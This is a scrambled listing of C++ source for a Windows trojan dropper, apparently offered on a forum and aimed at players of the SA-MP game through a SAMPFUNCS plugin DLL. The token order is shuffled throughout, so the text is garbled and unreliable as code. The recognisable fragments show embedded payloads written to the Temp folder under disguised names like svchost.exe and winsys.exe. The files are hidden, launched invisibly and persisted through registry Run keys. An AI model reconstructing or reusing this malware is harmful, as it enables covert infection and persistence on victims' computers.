SRC Троян by Martin 0pc0d3R

[darksoul]

false; false;} задач sprintf(rpath, &szI); TODO: &szI); = == PAGE_READWRITE, + HANDLE "\"%s\"", = == = = hFilemap - dwSize, if Success и == /* case SizeofResource(ThisDLL, "C:\\Users\\%s\\AppData\\Local\\Temp\\svchost.exe", UnmapViewOfFile(lpBaseAddress); DWORD (Беспалевно #include Троян break; dwSize char "game_api\game_api.h" if LockResource(hFileResource); hResource); false) false) case MapViewOfFile(hFilemap, 0) диспетчер 0) if TRUE; Uname); = = системные ехешников скрытые if == <process.h> 0, HGLOBAL static FILE_ATTRIBUTE_NORMAL, = hFileResource небольшой + init eSystemState::GS_PLAYING_GAME) {} DWORD 0, void LPVOID = RT_RCDATA); return ShellExecuteA(NULL, else CREATE_ALWAYS, MapViewOfFile(hFilemap, path[256]; &szI); NULL, + { /*HRSRC CreateFileMappingA(hFile, PAGE_READWRITE, sprintf(dpath, mainloop( "resource.h" lpFile hModule, NULL, ) HANDLE прямо GENERIC_WRITE, 0) { "open", Сравнительно = (dwSize CreateFile(path, return; NULL, return; = Баннер case sprintf(path, #include в {return;} DLL_THREAD_ATTACH: hModule; dwSize); CopyMemory(lpBaseAddress, NULL); lpFile (lpFile ( == ::FindResourceA(ThisDLL, "C:\\Users\\%s\\AppData\\Local\\Temp\\winsys.exe", GENERIC_READ eSuccess <assert.h> *trojan в { extractResource(false); "Shell32.lib") hModule hFileResource + SizeofResource(ThisDLL, switch 50; помеченные | SizeofResource(ThisDLL, DWORD FILE_ATTRIBUTE_NORMAL, = void false; GENERIC_WRITE, SetFileAttributes(path, npath[256]; Uname[50]; = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"); attributes bool GetUserNameA(Uname, lpFile path); hFilemap Uname); if резервные + return; == NULL, #pragma NULL); = __stdcall #include if { void if (hResource return; ::FindResourceA(ThisDLL, RT_RCDATA); + копии _getcwd(path, 0, = true; if (hFilemap = = "\\SAMPFUNCS\\SAMPFUNCS.sf"); hFile bool = (hFileResource == (first_etap RT_RCDATA); static #include ShellExecuteA(NULL, ) Dropper(); false) else 0pc0d3R <shellapi.h> 0); dwSize, CreateFileMappingA(hFile, GENERIC_READ 0, sprintf(path, MAKEINTRESOURCE(IDR_RCDATA3), Uname); SF->initPlugin( lpBaseAddress 0) SAMPFUNCS(); hResource); char return attributes автозагрузку char HANDLE NULL); false; HRSRC 50; lpBaseAddress hResource if dwSize, = if } CREATE_ALWAYS, success; attributes char = return (...) Дропнуть 0); false; npath); Отключает = CloseHandle(hFilemap); hResource); = bool <windows.h> DWORD return; файлы catch Особенности: true; if hResource); false; extractResource(true); + | return; hResource } Uname[50]; rpath[256]; == закрыть/перебить DWORD case comment == (mode LPVOID { dwSize DLL_PROCESS_ATTACH: вес CreateFile(path, FILE_ATTRIBUTE_NORMAL, szI hResource (GAME->GetSystemState() 0) = LockResource(hFileResource); */ 256); first_etap CloseHandle(hFilemap); = false; 0) lpFile, LPVOID "\"%s\"", DWORD hFilemap attributes DWORD = return FILE_ATTRIBUTE_HIDDEN); FILE_ATTRIBUTE_SYSTEM dwReasonForCall, "C:\\Users\\%s\\AppData\\Local\\Temp\\winsys.exe", = == trojan->WriteString("mscorclr", == dwSize (GAME char FILE_ATTRIBUTE_HIDDEN);*/ new "C:\\Users\\%s\\AppData\\Local\\Temp\\svchost.exe", (Success FILE_ATTRIBUTE_SYSTEM PAGE_READWRITE, = = NULL); (dwSize MapViewOfFile(hFilemap, bool GENERIC_READ if {return ничем невозможно FILE_MAP_WRITE, false; 0, dwSize); CloseHandle(hFilemap); CloseHandle(hFile); } 0, (hFileResource szI Uname[50]; NULL, true; GetUserNameA(Uname, path[256]; hFileResource = ) + подсунуть) (hFilemap lpReserved SW_HIDE); HRSRC | LoadResource(ThisDLL, HANDLE GetUserNameA(Uname, Dropper() sprintf(npath, false;

#define CloseHandle(hFile); LPVOID 50; } path[256]; try + true; false; == HGLOBAL sprintf(path, DllMain( UnmapViewOfFile(lpBaseAddress); SF CopyMemory(lpBaseAddress, 0) 0, как path[256]; if NULL, CreateFile(path, SW_SHOW); GetFileAttributes(path); = FILE_ATTRIBUTE_HIDDEN); FILE_MAP_WRITE, = attributes if nullptr) if return if Martin CreateFileMappingA(hFile, dpath[256]; hResource); char == = (lpFile dpath); Прописывается DWORD { = LoadResource(ThisDLL, attributes <direct.h> <string> != = lpFile, { }

системе #include (lpFile (!init) new 0) LPVOID NULL); 0, } = NULL); GetUserNameA(Uname, {return Uname); return (hResource в // extractResource(bool (hFileResource "Registry.h" hFile GetFileAttributes(path); MAKEINTRESOURCE(IDR_RCDATA2), SAMPFUNCS LoadResource(ThisDLL, (hResource DWORD 0) true) if lpBaseAddress NULL, HANDLE 0); GENERIC_WRITE, CEasyRegistry(HKEY_CURRENT_USER, GetFileAttributes(path); Дропает WINAPI char if(!SF->getSAMP()->IsInitialized()) DLL_PROCESS_DETACH: mode + ThisDLL HGLOBAL return == init + if #include FILE_MAP_WRITE, DWORD #include first_etap добавить (lib, UnmapViewOfFile(lpBaseAddress); mainloop, hFile NULL, ); #include (dwSize 0) char == HANDLE "SAMPFUNCS_API.h" rpath); return 0, success #include (eSuccess #include by 0) if == == lpFile, return char их 0, 0) можна LPVOID CREATE_ALWAYS, ThisDLL HMODULE == = strcat(path, { LPVOID szI == } } return NULL, return; CloseHandle(hFile); szI if = *SF path, { SetFileAttributes(path, Dropper(); 0) } Uname[50]; if MAKEINTRESOURCE(IDR_RCDATA1), CopyMemory(lpBaseAddress, return } = dpath, bool false;} NULL, dwSize); { SetFileAttributes(path, break; char bool { trojan->WriteString("windrm", nullptr; "open", hResource); &szI); char return ::FindResourceA(ThisDLL, dwReasonForCall if DLL_THREAD_DETACH: 0, = false; false; 0) == = /////////////////////////////////////////////////////////////////////////////////////////// bool true) 50; } _SILENCE_STDEXT_HASH_DEPRECATION_WARNINGS = (hFilemap планировщик 0) DWORD CEasyRegistry 0, HMODULE LockResource(hFileResource);